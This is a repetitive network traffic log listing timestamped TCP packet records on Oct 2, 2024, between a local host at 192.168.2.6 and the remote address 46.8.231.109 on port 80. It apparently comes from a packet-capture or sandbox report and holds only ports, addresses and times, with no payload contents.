                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929117918 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929143906 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929160118 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929203987 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929214954 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929225922 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929236889 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929259062 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929282904 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929338932 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929351091 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929377079 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929390907 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929421902 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929435015 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929445028 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929456949 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929467916 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929466963 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929480076 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929491043 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929495096 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929512978 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929529905 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929816008 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929878950 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929882050 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929892063 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929914951 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929941893 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929977894 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.929990053 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.930001974 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.930013895 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.930018902 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.930036068 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.930059910 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.930166960 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.930186033 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.930197954 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.930208921 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.930218935 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.930222988 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.930247068 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.930260897 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.930367947 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.930382013 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.930402994 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.930416107 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.001554012 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.001600981 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.001605034 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.001612902 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.001640081 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.001648903 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.001658916 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.001672029 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.001703024 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.001723051 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.001734972 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.001745939 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.001759052 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.001784086 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.008965969 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009006977 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009018898 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009027004 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009044886 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009066105 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009145975 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009156942 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009167910 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009179115 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009179115 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009196043 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009212017 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009234905 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009247065 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009258032 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009282112 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009294987 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009301901 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009313107 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009346962 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009443998 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009454966 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009465933 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009476900 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009479046 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009489059 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009500027 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009502888 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009529114 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009530067 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009541988 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009552002 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009568930 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009592056 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009658098 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009668112 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009679079 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009690046 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009691954 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009701014 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009712934 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009716034 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009746075 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009876013 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009886026 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009897947 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009908915 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009910107 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009919882 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009931087 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009933949 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.009959936 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010013103 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010025024 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010061026 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010121107 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010133028 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010231018 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010240078 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010252953 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010265112 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010265112 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010270119 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010283947 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010288954 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010303020 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010313988 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010315895 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010325909 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010327101 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010339975 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010354042 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010379076 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010396957 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010406971 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010417938 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010440111 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010463953 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010490894 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010504007 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010535955 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010807037 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010855913 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010865927 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010873079 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010885000 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010898113 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010970116 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010981083 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.010991096 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.011001110 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.011003971 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.011013031 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.011029005 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.011056900 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.011151075 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.011162043 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.011173010 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.011182070 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.011195898 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.011202097 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.011205912 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.011217117 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.011243105 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016352892 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016386032 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016396999 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016398907 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016433954 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016498089 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016509056 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016520977 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016532898 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016537905 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016561031 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016590118 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016644001 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016654968 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016665936 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016676903 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016691923 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016724110 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016845942 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016858101 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016869068 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016876936 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016880035 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016892910 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016902924 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016902924 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016916037 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016927958 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016930103 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016947985 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.016961098 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017081022 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017092943 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017103910 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017127037 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017159939 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017182112 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017193079 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017204046 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017215967 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017236948 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017328978 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017338991 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017349958 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017359972 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017369986 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017369986 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017400980 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017421961 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017484903 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017496109 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017507076 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017517090 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017527103 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017528057 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017540932 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017553091 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017571926 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017611980 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017642021 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017712116 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017723083 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017733097 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017744064 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017745972 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017755985 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017762899 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017769098 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017788887 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017805099 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017831087 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.017863035 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.089212894 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.089226007 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.089237928 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.089272976 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.089299917 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.089319944 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.089330912 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.089343071 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.089354038 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.089359999 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.089380026 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.089406013 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.096688032 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.096748114 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.096756935 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.096767902 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.096780062 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.096791029 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.096801043 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.096833944 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.096844912 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.096862078 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.096904993 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.096934080 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.096945047 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.096956968 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.096966982 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.096972942 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.096978903 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.097007990 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.097032070 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.097048998 CEST805851546.8.231.109192.168.2.6
